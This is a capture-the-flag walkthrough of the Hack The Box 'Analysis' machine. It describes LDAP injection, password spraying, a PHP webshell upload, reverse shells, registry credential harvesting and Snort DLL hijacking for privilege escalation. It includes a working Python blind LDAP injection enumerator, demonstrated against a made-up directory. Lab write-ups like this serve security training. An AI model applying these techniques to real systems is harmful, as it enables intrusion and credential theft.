In this post, I would like to share a walkthrough of the Analysis machine from Hack The Box.

This machine is rated Hard on Hack The Box.

What will you gain from the Analysis machine?

For the user flag, you must exploit a PHP website that queries user information from Active Directory over LDAP. I first use LDAP injection to enumerate user accounts, then extend the same injection to read a shared account's description field, which contains a password. That password grants access to the admin panel, where an upload feature can be abused in two ways: uploading a PHP webshell, or executing an HTA file. Credentials for the next user then turn up in the autologon registry values and in the web server logs.

As for the root flag, you exploit Snort's dynamic preprocessor loading: craft a malicious DLL and place it in the directory Snort loads preprocessors from, so it runs with Snort's privileges the next time the service starts.

Information Gathering on Analysis Machine

Once the VPN connection is up (the configuration file is downloaded from Hack The Box), we can start with an nmap scan.

└──╼ $nmap -sC -sV -oA initial 
Starting Nmap 7.93 ( ) at 2024-06-01 07:23 EDT
Nmap scan report for
Host is up (0.28s latency).
Not shown: 987 closed tcp ports (conn-refused)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-01 11:23:49Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3306/tcp open  mysql         MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-01T11:24:07
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 88.49 seconds
└──╼ $

The scan shows a Windows domain controller (DC-ANALYSIS) for the analysis.htb domain: DNS, Kerberos, LDAP/LDAPS, SMB with message signing required, MySQL on 3306 (unauthorized), and an HTTP listener on port 80 whose root returns "Not Found". Add analysis.htb to /etc/hosts, then let's access the website interface.

There is nothing that I can abuse on the website interface itself.

Sadly, directory brute-forcing turns up nothing worth looking into either.

Therefore, let's enumerate subdomains (virtual hosts) on the machine.

The internal subdomain responds with an error of "403: Forbidden, Access is denied", so there is something behind it.

Enumerating further under the internal subdomain, we successfully sight a PHP file.

Requesting it without arguments gives an error saying "missing parameter".

After analyzing the parameter, it turns out to be passed into an LDAP query, so a wildcard value matches accounts by prefix; this way I managed to find a potential username, technician.

Another potential username turns up the same way, which we can use for further progress.

The response shown above confirms the injected filter is evaluated by the server.

Accessing login.php under the employees directory brings us to a login page.
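To make the injection concrete, here is an added example (not code from the original post) that models the blind LDAP injection used above in two stages: enumerating usernames with a trailing wildcard, and then reading the description attribute of a known account by closing the sAMAccountName term and appending our own filter term. It runs offline against a small constructed directory, so the exact server-side filter, the account list, and the description value are all assumptions made for the demo; only the names technician and jdoe come from the walkthrough.

```python
import re
import string

# Constructed sample directory standing in for the domain controller's LDAP
# data. Everything here is made up for the example; only "technician" and
# "jdoe" are account names mentioned in the walkthrough.
DIRECTORY = [
    {"objectclass": "user", "samaccountname": "technician",
     "description": "pw:s4mpl3-pw!"},          # password leaked via description
    {"objectclass": "user", "samaccountname": "jdoe"},
    {"objectclass": "user", "samaccountname": "admin"},
    {"objectclass": "user", "samaccountname": "administrator"},
    {"objectclass": "computer", "samaccountname": "dc-analysis$"},
]

# Characters tried for each position. '*' is excluded because it is the LDAP
# wildcard; '(' ')' '\\' are excluded because they break the filter instead of
# matching a value (they would need the \28 \29 \5c escapes to be matched).
CHARSET = string.ascii_lowercase + string.digits + "_-.!:$"


def parse_filter(text):
    """Parse the RFC 4515 subset (&...), (|...), (!...), (attr=value) into an
    AST; raise ValueError on anything malformed, as a real server would."""

    def node(i):
        if text[i] != "(":
            raise ValueError("expected '(' at %d" % i)
        i += 1
        op = text[i]
        if op in "&|!":
            children, i = [], i + 1
            while text[i] == "(":
                child, i = node(i)
                children.append(child)
            if text[i] != ")" or (op == "!" and len(children) != 1):
                raise ValueError("bad %s filter" % op)
            return (op, children), i + 1
        eq = text.index("=", i)          # ValueError if no '='
        close = text.index(")", eq)      # values may not contain ')' here
        return ("=", text[i:eq].lower(), text[eq + 1:close]), close + 1

    try:
        ast, end = node(0)
    except IndexError:
        raise ValueError("unterminated filter")
    if end != len(text):
        raise ValueError("trailing data after filter")
    return ast


def matches(ast, entry):
    """Evaluate a parsed filter against one entry (case-insensitive, as AD is)."""
    op = ast[0]
    if op == "&":
        return all(matches(c, entry) for c in ast[1])
    if op == "|":
        return any(matches(c, entry) for c in ast[1])
    if op == "!":
        return not matches(ast[1][0], entry)
    _, attr, value = ast
    actual = entry.get(attr)
    if actual is None:
        return False
    pattern = "^" + ".*".join(re.escape(p) for p in value.split("*")) + "$"
    return re.match(pattern, actual, re.IGNORECASE) is not None


def vulnerable_lookup(name):
    """Stand-in for a lookup page like list.php (the filter shape is an
    assumption): the parameter is pasted straight into the filter, which is
    the injection point. Returns matching entries, [] for a malformed filter."""
    filt = "(&(objectClass=user)(sAMAccountName=%s))" % name
    try:
        ast = parse_filter(filt)
    except ValueError:
        return []
    return [e for e in DIRECTORY if matches(ast, e)]


def oracle(name):
    """Boolean oracle: did the page show at least one result?"""
    return bool(vulnerable_lookup(name))


def enumerate_usernames(oracle, charset=CHARSET, max_len=32):
    """Blind enumeration: 'ab*' tells us whether any user starts with 'ab';
    an exact probe (no wildcard) tells us when a name is complete."""
    found = []

    def walk(prefix):
        if len(prefix) >= max_len:
            return
        for ch in charset:
            cand = prefix + ch
            if oracle(cand + "*"):
                if oracle(cand):
                    found.append(cand)
                walk(cand)          # keep going: 'admin' may prefix 'administrator'

    walk("")
    return found


def extract_attribute(oracle, username, attr, charset=CHARSET, max_len=64):
    """Read another attribute of a known user one character at a time by
    injecting ')(' to close the sAMAccountName term and add (attr=prefix*)."""
    value = ""
    while len(value) < max_len:
        for ch in charset:
            if oracle("%s)(%s=%s*" % (username, attr, value + ch)):
                value += ch
                break
        else:
            break                   # no character extends the prefix: done
    return value


if __name__ == "__main__":
    users = enumerate_usernames(oracle)
    print("users:", users)
    for u in users:
        print(u, "description:", repr(extract_attribute(oracle, u, "description")))
```

Against the real target the oracle is an HTTP request whose response you compare with the "no result" page, and two caveats apply: AD attribute matching is case-insensitive, so the extracted string comes back in the charset's case and a recovered password may need case variants tried, and an unbalanced payload (for example a stray closing parenthesis) is rejected by the server rather than matched, which is why the payload closes one term and reuses the query's own trailing parentheses.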

Spraying the username and password for the Analysis machine

The screenshot above shows the list of usernames we collected for the spray.

The spray takes a few minutes depending on the connection to the machine.

At last, we obtain valid login credentials: the password read from the description field via the LDAP injection works on the admin login.

We are presented with the dashboard shown above.

We can use the simple PHP reverse shell shown in the screenshot above.

Let's upload the file through the site's upload function, upload.php.

Judging by the error message, the upload itself succeeded and the file was written.

Let's test command injection through the uploaded file, which works.

Running the reverse shell command through it gives us a connection back.

However, the machine's language is not English, so command output and paths look unfamiliar.

After a while, I located the PHP file we found earlier (list.php) on disk.

The source code of list.php is shown in the screenshot above.

We also need to look into the employees directory.

There we find a credential that looks like a MySQL database password.

Using it, let's obtain another shell with the command shown above.

Finally, we obtain a new reverse shell connection back to us.

Let's upload PrivescCheck.ps1, which can be found here.

Then run it with the command shown above.

After a while, it reports jdoe's credentials, recovered from the autologon values stored in the Winlogon registry key.

These credentials can be used with evil-winrm.

We can read the user flag by typing the "type user.txt" command.

Escalate to Root Privileges Access

I noticed a suspicious snort directory, which stands out because Snort is rarely installed on a machine like this.

Two directories are stored within the snort directory.

More importantly, we can write into the directory, so we can upload a malicious file there; confirm the permissions with icacls before relying on it, and check the dynamicpreprocessor directory line in snort.conf to be sure it is the folder Snort actually loads from.

Let's start our listener on the attacker's machine.

Next, let's create a malicious payload saved in DLL format.

Then upload the DLL into that directory on the victim's machine.

It takes a while before Snort restarts and loads the DLL, at which point the reverse shell connects back to our attacker's machine.

Boom! At last, we managed to retrieve the root shell.

We can read the root flag by typing the “type root.txt” command

Another way to access the root shell on the machine